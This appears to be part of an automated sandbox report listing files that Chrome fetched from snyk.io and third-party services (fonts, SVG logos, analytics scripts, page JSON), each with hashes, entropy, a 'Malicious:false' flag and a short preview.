                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"5aWlgvsONXZtxPEVDIGLAr","type":"Entry","createdAt":"2024-04-18T20:28:32.211Z","updatedAt":"2024-04-23T20:27:23.915Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":31,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateIndexPage"}},"locale":"en-US"},"fields":{"internalName":"Book a Demo page (new)","title":"See Snyk in action - Book a live demo","slug":"schedule-a-demo","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"3kyp0d6LGgpSuUrJGQ7crk","type":"Entry","createdAt":"2024-04-18T20:28:32.586Z","updatedAt":"2024-04-23T20:27:24.076Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":1
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (12465), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):12465
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.143073751658841
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:VPUJSC+IBjai4s9maJb7GKuJt6HHfPcR3WriRcVEvoh2uj5li/spF7uxQ4wsJvUk:Vc49Il/URxTduq0F765UNMrd
                                                                                                                                                                                                                                                                                                              MD5:70D60F116BE0547CD0A4192C213F2CCB
                                                                                                                                                                                                                                                                                                              SHA1:1A517CBEC805E9148CC40A91CD440FCFEBDFC608
                                                                                                                                                                                                                                                                                                              SHA-256:E186DBBF953431129D19D46D52AD1BFBE6232CED1752EFC48EA1F3EC0AB00422
                                                                                                                                                                                                                                                                                                              SHA-512:695DBB34ED677B95677442381DE3585D6D5A728D06E4974316A7977CDAC696F62A03576AA99B4D3EFC3F2E3D3713DABE85B0693A1C3CE924404732520BF9E98B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(()=>{var e=(e,t)=>()=>(e&&(t=e(e=0)),t),t=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);function n(e){let t=location.href;if(e){let n=new URL(t);if(n.pathname!==e)return n.pathname=e,n.search="",n.href}return t}var r,i,a,o,u,c,s,l,f,d,v,m,p,h,g,y,T,S,E,b,L,w,C,M,x,k,A,F,I,B,D,P,R,N,q,O,H,V,U,_,j,J,$,z,G,K,Q,W,X,Y,Z,ee,et,en,er,ei,ea,eo,eu,ec,es,el=e(()=>{}),ef=e(()=>{c=function(){return window.performance&&performance.getEntriesByType&&performance.getEntriesByType("navigation")[0]},s=function(e){if("loading"===document.readyState)return"loading";var t=c();if(t){if(e<t.domInteractive)return"loading";if(0===t.domContentLoadedEventStart||e<t.domContentLoadedEventStart)return"dom-interactive";if(0===t.domComplete||e<t.domComplete)return"dom-content-loaded"}return"complete"},l=function(e){var t=e.nodeName;return 1===e.nodeType?t.toLowerCase():t.toUpperCase().replace(/^#/,"")},f=function(e,t){var n="";try{for(;e&&9!==e.nodeType;){var r=e,i=r.id?"#"+r.id:l(r)+(r.classL
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:gzip compressed data, was "tmpjb_3iwb1", last modified: Tue Sep 17 11:16:17 2024, max compression, original size modulo 2^32 5482
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):1142
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.838370181242706
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:24:XEHTZiYxeX9oZbeYbis3qP4vIPqxAMp4gUaqHlOeF/:XKAUetoJeYGs3Hwqq5g/qHlOeF/
                                                                                                                                                                                                                                                                                                              MD5:2D333D3B78DEEAB0A42FC5C2C41494F3
                                                                                                                                                                                                                                                                                                              SHA1:B5439CE6D3B2357466B22E3188CFB11457DF3DAD
                                                                                                                                                                                                                                                                                                              SHA-256:2D611DBDE27CA7196AE91A5D1DC899A33323BE04DD288D38A68FB445004313DF
                                                                                                                                                                                                                                                                                                              SHA-512:C6BDE41051D6EC18CA92CD98CA8B6711248760E889F0A4AB9C64DE61F6A6123D3830D50E5967E90FA9F0840F5844D59C4EEA26A10056E2666675F2750D88CCF6
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://app.usercentrics.eu/browser-sdk/4.38.4/cross-domain-bridge.html
                                                                                                                                                                                                                                                                                                              Preview:.....e.f..tmpjb_3iwb1..X[s.6.~.WhyX..1}.....C....K'.a.Y.O..Jr..N.{%..lSC....p.w.wn.<.4]LV........P^@......u.....P..... .r..Q..| .....a>.y...+.x......;Q...>.].&.;<.R.D8.)....=..'..f..3L...1b>.....~Hv0N.........Re...W...@.&_...z........j.^.+0.N....Z.9f..4..d|.\-....)..T*6..&...E....X.F(...|.6./..G........D..,n.....7x....n/..`.<E<&i.......{...D..E..9..q.....4<I6f5^.r...I[=0.....M.S.#/....J1.iZ.l)....h.\.3.v.`.&.9^.$....?..Ee...B..<...p?U_.7n..NtN.....v.B.N....TH....S.7......E...D`.!.....rq.grn...e..."k!...B_O.>..B..-..mL)..1+...mcK.....50.*.....D[.{..g.......Q.Y...M.W=F..B...J....ZWThe.vL..%O...kO....[....U.....^j...'\......[..p.s5N.ib.t..E.....a.}......p.'8..z.V.H.r.a.i....!..["W.R.W...>!..=..e..hhXS.6"X.......).D......l...r....Zf....NQ...G.E.....L.......}A...^.<.X..X.z..U.@u.4.7.O\,.*M6U...;..C.\Y.Z.Y...r..$m.WAkHO..Ns\......9.......oe.;..\...}#N....6..{GP.+.<8...c.r..(....I..E..|p< .9%I..<|...pPL.Z^...D.f.y.g-Y6.zO..........&S....[...?
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Web Open Font Format (Version 2), TrueType, length 7816, version 1.0
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):7816
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.974758688549932
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Agw5ksLwlyK8F2BXU96Fc575OI3+ga534SlEFwTG4ovej9be:Al5y8FSUMS5VOq1KISlvS4ov+4
                                                                                                                                                                                                                                                                                                              MD5:25B0E113CA7CCE3770D542736DB26368
                                                                                                                                                                                                                                                                                                              SHA1:CB726212D5D525021752A1D8470A0FB593E0C49E
                                                                                                                                                                                                                                                                                                              SHA-256:9338E65FC077355C7A87AE0D64CC101E23B9BF8AD78AE65F0F319C857311B526
                                                                                                                                                                                                                                                                                                              SHA-512:A0D331E62AB4727F49CA286A1EE7FB81CDDC5BB9EDF71EF84F4BD4FA1552069AF1A82752011BA88FAE80862D034135926B7E99D70E59D626D66D4EDE90E94C30
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://fonts.gstatic.com/s/poppins/v21/pxiByp8kv8JHgFVrLCz7Z1xlFQ.woff2
                                                                                                                                                                                                                                                                                                              Preview:wOF2..............>P...4.............................`..T.......6..6.$..h. ..D.....03......~.(J........".!]X.......fD .s..I......(&.:..K..3=/.?0.?B........}.}.L....9.!1..6.u....(...m..\.6R.H....(..J.....YXus..2..susq.E^.v.....z..{........BN^...}[a.8&.By.9...*...O......3..zW.|R.I.8 .Z.V. ..v..*.X_F....,[ye....wU.m..U.....}....'.^.jQK..@....n....)...;.. T..@]...hz.>.6.Y.tgeF.p...k?.g.jIb..."'.p.j.W}..X..........0'@.!<..$.<\TG...........^......W..<..LhX...r..Q.8........W.8[...W.z.W...,*`...}...CY..z..m.B...z._..}..0$..F. ....<........!...X.....`.._UY{..k..*..[.+....h..G...x4.h...#...n=.!....G.G..<....~.nS...M.d.RT...g..$:/..j..y.@.FIg.".#..]'...4...n..y.Q.s'..I@P.w..xI.......#.J.n.n.i...'....@..H...H..1.;7...ddSF.d..].*...Z......*W.../S....^V..k..%.......CF....B4.kN....Mp.......+..i...M.>.`m...=..$c..$.h.t..|..d+...6j..W...~a.M.'4..f.`...( .0Vq,.&f.?k.%i.|tr..`k...F..{l.T.T=.......aK..F....nAu..."....Cpc..B.`..s...,S.......P._[K?..+...|2...z....
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):5494
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.014411669608356
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:BDLdTOrnrksZQuo5U8VxuM/2E8U4wDHo7QPEw37VR68nshUltRTaqNUzz:7TOrrOLdjEQPl35RaUt9roz
                                                                                                                                                                                                                                                                                                              MD5:CA4FBCC7F63696804483E8F2FBA0E880
                                                                                                                                                                                                                                                                                                              SHA1:85734B2D3A1FD9CB87582E822DAFE4CE37899BDD
                                                                                                                                                                                                                                                                                                              SHA-256:7AA4C53376D47EAB819B560A68B53BE78E06CA4AF8844548DA8DEDD79A7DA966
                                                                                                                                                                                                                                                                                                              SHA-512:BA2818E133926513C4C04862E72C4E2945C289EC35166E038419670230E08A0D428210CCC728F8E0B2E0D570677F30D5E694E9627C7DAA2889B12069C5DE1781
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://res.cloudinary.com/snyk/image/upload/v1677786151/website-customer-logos/logo-reddit.svg
                                                                                                                                                                                                                                                                                                              Preview:<svg width="140" height="48" viewBox="0 0 140 48" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_1_23)">.<path d="M125.884 19.5621C127.561 19.5621 128.92 18.2031 128.92 16.5268C128.92 14.8505 127.561 13.4915 125.884 13.4915C124.208 13.4915 122.849 14.8505 122.849 16.5268C122.849 18.2031 124.208 19.5621 125.884 19.5621Z" fill="#FF4500"/>.<path d="M82.5332 29.4691C84.0223 29.4691 84.881 28.3525 84.8239 27.2642C84.7956 26.6916 84.738 26.319 84.6809 26.0329C83.7645 22.0818 80.5579 19.1607 76.7492 19.1607C72.2254 19.1607 68.5603 23.2554 68.5603 28.2949C68.5603 33.3343 72.2254 37.429 76.7492 37.429C79.5844 37.429 81.6173 36.3984 83.0776 34.7663C83.7933 33.9646 83.6503 32.7333 82.791 32.1318C82.0753 31.6451 81.1877 31.8169 80.5291 32.3608C79.8993 32.9052 78.6968 33.9929 76.7492 33.9929C74.459 33.9929 72.512 32.0171 72.0823 29.4114H82.5332V29.4691ZM76.7209 22.6257C78.7822 22.6257 80.5579 24.229 81.2165 26.4338H72.2254C72.884 24.2007 74.6592 22.6257 76.7209 22.6257ZM68
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):32069
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.512250357902126
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:5T/xyggPv4qDs8yrImVLRDcrImVLRDtrImVLRDvxMVbWD3nh:BhrlVcrlVtrlVyu3nh
                                                                                                                                                                                                                                                                                                              MD5:645C26EA6768BC6149D40A60A2D56281
                                                                                                                                                                                                                                                                                                              SHA1:85A5811ADDA37E1245C92C9D2063E9B74AEBCAEC
                                                                                                                                                                                                                                                                                                              SHA-256:F212E44FF5675836B42E78C7DFD927B847B41A0EB56DF98EAB636B236E96F567
                                                                                                                                                                                                                                                                                                              SHA-512:D9CC6493E9A5327BE545FA8B8977D00F6EBA3AC13FCDEC02591D6F71AC723A677739709C9726B0E8C2B56FFD05E0CDA732DE8F62033A76A4B9C67BE6D1186899
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg viewBox="0 0 516 451" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_8220_28736)">.<g clip-path="url(#clip1_8220_28736)">.<path d="M279.409 67.4032C279.409 67.2689 279.275 67.0004 279.141 67.0004C277.664 66.7319 276.456 66.8662 275.784 67.5374C275.382 67.9402 275.113 68.4771 275.113 69.1484V72.5045C275.113 73.1757 275.247 73.7127 275.65 74.1154C276.187 74.6524 276.993 74.6524 277.664 74.6524H277.932H278.201C278.335 74.6524 278.604 74.5182 278.604 74.2497C278.604 74.1154 278.469 73.9812 278.335 73.9812L279.006 67.8059C279.141 67.6717 279.275 67.5374 279.409 67.4032Z" fill="url(#paint0_linear_8220_28736)"/>.<path d="M332.839 95.8631C332.704 95.7288 332.436 95.4603 332.302 95.1919C331.362 93.9837 324.515 87.0029 323.576 86.1975C322.502 85.1235 321.562 85.1235 320.488 85.1235H311.359C310.688 85.1235 309.748 85.2577 308.138 86.1975C306.661 87.0029 292.297 95.4604 290.82 96.4001C289.343 97.2055 285.853 97.6083 283.034 93.1782C282.631 92.6412 282.362 92.1042 281
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (44881), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):44888
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.131331630700203
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:384:3X2JIdictPUCZNEMVvpxl+fm9re9PE8waMe:n2JIUct8AXr9faMe
                                                                                                                                                                                                                                                                                                              MD5:AA9F9597D58C702E1B5BEA76D9A32991
                                                                                                                                                                                                                                                                                                              SHA1:1B45C690D31D6AD11EB5EE942B5C4F58D86BED35
                                                                                                                                                                                                                                                                                                              SHA-256:DDC7C712A21D80ECC76AA28C16E4ACBD931D3C5C40525679FE822E23E25CF900
                                                                                                                                                                                                                                                                                                              SHA-512:78B6C978F9C0BAB63D13F643C62A7F4250BA376A98DCEEE4DCDFFABC5234BBD3CFF09ED02083AFFEFDD30577116B055972240CE376B05783203BDFF9593CEA5E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/customer-resources.json?slug=customer-resources
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2zERgk1K0w1458K67zl8Zz","type":"Entry","createdAt":"2024-02-08T13:46:10.315Z","updatedAt":"2024-04-17T17:44:30.955Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":16,"revision":4,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"Snyk Customer Resources | Snyk","title":"Snyk Customer Resources | Snyk","slug":"snyk-customer-resources-or-snyk","uri":"customer-resources","pageLocalization":["fr","ja","pt-BR","de"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"6qGET11QmeosuZ8IUymV9d","type":"Entry","createdAt":"2024-02-08T13:46:10.456Z","updatedAt":"2024-04-17T17:44:31.366Z","environment":{"sys":{"id":"master","type":"Link","link
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):3776
                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.364643034622523
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:tTpKtkKtKF3ruWSd+GlD4ajyI9SLNWvrA72Jk0jQ2YnS:y+F7HG+fNsk2wS
                                                                                                                                                                                                                                                                                                              MD5:2284E4346A80A07B1D571B8459ECD409
                                                                                                                                                                                                                                                                                                              SHA1:C2BD79A18FD90E6416D3C0BD2E0B3A453899E878
                                                                                                                                                                                                                                                                                                              SHA-256:DDDFE47CF4CE77DC6DAC768A6AF004C591E4308350273D2B7BCD393C7BF47671
                                                                                                                                                                                                                                                                                                              SHA-512:082319B004EDB5F19894892B50535571C0CD475C70F270E280FC3F23EC3E25EC5DF6C9BC3EF068CC84E6D68C0DE7D640DF9E819C9A88B052EF91FA3E39EBCB52
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:<svg fill="none" viewBox="0 0 64 64" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"><linearGradient id="a" gradientUnits="userSpaceOnUse" x1="0" x2="57.0839" y1="0" y2="54.8724"><stop offset="0" stop-color="#9043c6"/><stop offset="1" stop-color="#0a26b8"/></linearGradient><linearGradient id="b" gradientUnits="userSpaceOnUse" x1="56" x2="12.5237" y1="56" y2="25.9134"><stop offset="0" stop-color="#e555ac"/><stop offset="1" stop-color="#f99048"/></linearGradient><path clip-rule="evenodd" d="m47.3704 18.5808.952 2.3072c7.6776 2.7944 7.6776 3.1192 7.6776 4.0432v5.8688c0 .9184 0 1.2376-7.644 4.284l-.9464 2.3016c.2127.4577.4114.8878.5967 1.2924-1.0401-1.0368-2.0845-2.0765-3.1287-3.1085-.8716-.861-1.738-1.7133-2.6018-2.5631-1.289-1.268-2.5722-2.5303-3.8585-3.8075l-.0243-.0241-.0249-.0237c-.1973-.1871-.3447-.4123-.4348-.6562-.0901-.2438-.1218-.5027-.0941-.758l.0185-.1699-.0009-.1709c-.0003-.0517.0032-.1034.0103-.1548l.0187-.1341.0065-.1353c.0363-.7519.0072-1.5055-
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (25600), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):25600
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.448672016604878
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:RYzFZflJreLbrCS9h7vo/TMNt340KrExPdtS9p:eeLP7vobcSr
                                                                                                                                                                                                                                                                                                              MD5:48BE1563378F7C36BDADC0F2EB616856
                                                                                                                                                                                                                                                                                                              SHA1:2AA42B08FE8CC7AC0DC371D2309A38D5A465247F
                                                                                                                                                                                                                                                                                                              SHA-256:63C035E2F43180086B19EC08F35C8DEEE82B2B804DDFCF92F7F0E6D835957BFE
                                                                                                                                                                                                                                                                                                              SHA-512:6BD0492F48D247C598BB23CD41063A90C95B93AC491F80BB80FD755D004A2275CD04D0D456CDF618D70E344C74B6EA51FBD1EE3AFC62F68A91DA322A0BF9692F
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://js.driftt.com/core/assets/js/43.7ac85d58.chunk.js
                                                                                                                                                                                                                                                                                                              Preview:(window.webpackJsonp=window.webpackJsonp||[]).push([[43],{"1Fob":function(t,e,r){"use strict";var n=new RegExp("%[a-f0-9]{2}","gi"),f=new RegExp("(%[a-f0-9]{2})+","gi");function decodeComponents(t,e){try{return decodeURIComponent(t.join(""))}catch(f){}if(1===t.length)return t;e=e||1;var r=t.slice(0,e),n=t.slice(e);return Array.prototype.concat.call([],decodeComponents(r),decodeComponents(n))}function decode(t){try{return decodeURIComponent(t)}catch(f){for(var e=t.match(n),r=1;r<e.length;r++)e=(t=decodeComponents(e,r).join("")).match(n);return t}}t.exports=function(t){if("string"!==typeof t)throw new TypeError("Expected `encodedURI` to be of type `string`, got `"+typeof t+"`");try{return t=t.replace(/\+/g," "),decodeURIComponent(t)}catch(e){return function customDecodeURIComponent(t){for(var r={"%FE%FF":"\ufffd\ufffd","%FF%FE":"\ufffd\ufffd"},n=f.exec(t);n;){try{r[n[0]]=decodeURIComponent(n[0])}catch(e){var i=decode(n[0]);i!==n[0]&&(r[n[0]]=i)}n=f.exec(t)}r["%C2"]="\ufffd";for(var o=Obj
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 960x502, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):9816
                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.978935547610618
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:192:Ezt0BvFPZlfU9pUIPS2fdnRzoOu6b/ClabYOAQ3qoQNk+TwQM:rBvFBl8rba2f/7/ClwYvzJ6UwJ
                                                                                                                                                                                                                                                                                                              MD5:0980E326CF350F63AE6C90D90E9F90EA
                                                                                                                                                                                                                                                                                                              SHA1:2F9296F2FDC18105CC331FE9CCCBD6C5BB86E4D0
                                                                                                                                                                                                                                                                                                              SHA-256:8E10B9461477EAC030D6F6EAFD33174DB56182EFD19680AC39655DEF6F02C15A
                                                                                                                                                                                                                                                                                                              SHA-512:88E2A4C8945A6DD4A337BF56484AEBBF5BABF6D1818032B7EB19A9824E5323EA9E20742AF17698440B428106D17B7761136610CEF3BF5E15F9C3C8D6DC36960E
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/image/?url=https%3A%2F%2Fres.cloudinary.com%2Fsnyk%2Fimage%2Fupload%2Fv1717461856%2Ffeature-snyk-snowflake.jpg&w=960&q=75
                                                                                                                                                                                                                                                                                                              Preview:RIFFP&..WEBPVP8 D&.......*....>.H.L..&.!2x....gn..H*.......M}]............\....._.y.?..........o.~..Q..=Q:c......K..4.7.=...v..w..'..j=.89.........V.I.L<.=.F.J...P3.".......B5..t{.."\fVo....NBV...p.@....g.....9;....fY...G...GSp...c...4..3]...PG....J4.3..?.a...2.c.8|...{Z$.bz?........cJ.t.2....y.XFt..P.......&.Po.]o..........V.~3 k["-N.GT."+.XY{.?..,.g.Q..L..q.T...........KV.a...%_\G....H......]O... 4....P.....Q....d@;u]R.P..I6$...%...[.3.M...'..&]C..V.2.NI...x..as0......@QB..z./P.....i..Z.."0...y..d. .>...Z.....]..=..9.?..........h......T .....z....F.....v..M...I.f(.VF..U.a.!.......Fq.K_1.C..%o!....1t.1R.!.....q...D.]..8.u.8b...\.O......<;..H..e......K.........H7.C.K.)G.#8...F.N....,F.y`...........h.Po......U.p#...n[$.E6]N'.......B35.HGCv.so.........n..0..\ .$..j.~.....R.J.*&..eM......,..../.@.0......v..'.N)..7.. m.o$Z.`U4..T.`.........r.H.(.f.$H..'...u.......4.Y2...'..^....C=.....,T)..~.1.3...@.Hm...eC.S............9..mb.....Lz.`.@l
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (9198)
                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                              Size (bytes):9270
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.141086013932976
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:96:jJGAA61T1136GAzxXIzCzXEnMKHTo3Be+ODYTpU9WjfGgCnF8BpXzphl0sLmU:A61D3VAVXIOonMz0+OyjulaHLL
                                                                                                                                                                                                                                                                                                              MD5:00E9C65CBBA11C07C4BF4A6E2727B8EA
                                                                                                                                                                                                                                                                                                              SHA1:AC1A5D9B6FFCDE916A82169CD74C9A734BDF4A39
                                                                                                                                                                                                                                                                                                              SHA-256:129151ED0140041B198CE3B364A11861A3B5BAA5BB60475EBF7BEDB9B0FC94D6
                                                                                                                                                                                                                                                                                                              SHA-512:6C142FA3DE8B0452530D3E0DA7AF3B2CFCA2F0292282E07FF3AEF71426E791B650A8EDE02B5626B7ECF177B45B86630DACDDE9F9480B639E01C7B9D994535D2B
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              Preview:"use strict";(self.webpackChunk_segment_analytics_next=self.webpackChunk_segment_analytics_next||[]).push([[464],{9254:function(t,n,i){function e(t,n){var i,e;return"boolean"==typeof(null==n?void 0:n.enabled)?n.enabled:null===(e=null===(i=null==t?void 0:t.__default)||void 0===i?void 0:i.enabled)||void 0===e||e}i.d(n,{n:function(){return e}})},3162:function(t,n,i){i.r(n),i.d(n,{LegacyDestination:function(){return G},ajsDestinations:function(){return S}});var e=i(5163),r=i(4122),o=i(94),s=i(8404),a=i(1494),u=i(204),c=i(6096),l=i(9254),d=i(5944),h=i(8044),v=i(3098),f=i(3061),p=i(6338),m=i(7566),g=i(7070);function y(t){return t.toLowerCase().replace(".","").replace(/\s+/g,"-")}function w(t,n){return void 0===n&&(n=!1),n?btoa(t).replace(/=/g,""):void 0}function b(t,n,i,r){return(0,e.mG)(this,void 0,Promise,(function(){var o,s,a,u,c,l;return(0,e.Jh)(this,(function(d){switch(d.label){case 0:o=y(n),s=w(o,r),a=(0,m.Kg)(),u="".concat(a,"/integrations/").concat(null!=s?s:o,"/").concat(i,"/").conc
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (65363), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):116419
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.104249038958241
                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                              SSDEEP:768:uehJCAMeun4r5AZOhgaTxY2aTxZJTaTx+haTxU60uaTxs+DNmzmsxIBHcnMPFcZV:uezC4ri4lTxYTx2TxFTxX0lTxXNq5mE
                                                                                                                                                                                                                                                                                                              MD5:2DF4DD9BC4CFB98F33E7147005388C78
                                                                                                                                                                                                                                                                                                              SHA1:132D494301B6527579E7D0B0534A424E71A92A40
                                                                                                                                                                                                                                                                                                              SHA-256:3869540078D029704027E27CF5B96C8D0BB7EC397CE55F9AB02A1F9A6B4D30E2
                                                                                                                                                                                                                                                                                                              SHA-512:6B8964A06F9DB8C9C5AD3C6835A766A58311C56A6AFF7A7028BEE194EE22715D79A9F0AA3A9EC43EC52C8E99D5BEAE23219D5C0EFDE6BC09A9715A8D9FB3EC29
                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                                                                                              URL:https://snyk.io/_next/data/Cp4abAN54CGUdTYwS0J62/en-US/about.json?slug=about
                                                                                                                                                                                                                                                                                                              Preview:{"pageProps":{"page":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2tf23U3O0doS4ECgx7AkmD","type":"Entry","createdAt":"2022-10-21T23:25:33.197Z","updatedAt":"2024-03-01T12:51:39.212Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":35,"revision":8,"contentType":{"sys":{"type":"Link","linkType":"ContentType","id":"templateDefault"}},"locale":"en-US"},"fields":{"internalName":"About Snyk","title":"About Snyk | Snyk","slug":"about","uri":"about","pageLocalization":["de","fr","ja","pt-BR"],"seoSocialSharing":{"metadata":{"tags":[],"concepts":[]},"sys":{"space":{"sys":{"type":"Link","linkType":"Space","id":"oyrbri43adzz"}},"id":"2v38cejyFbtdTbB4trHoAZ","type":"Entry","createdAt":"2022-10-21T23:25:33.316Z","updatedAt":"2023-09-21T23:18:05.073Z","environment":{"sys":{"id":"master","type":"Link","linkType":"Environment"}},"publishedVersion":39,"revision":10,"contentType":
                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (3061), with no line terminators
                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                              Size (bytes):3061
                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.284732262485176
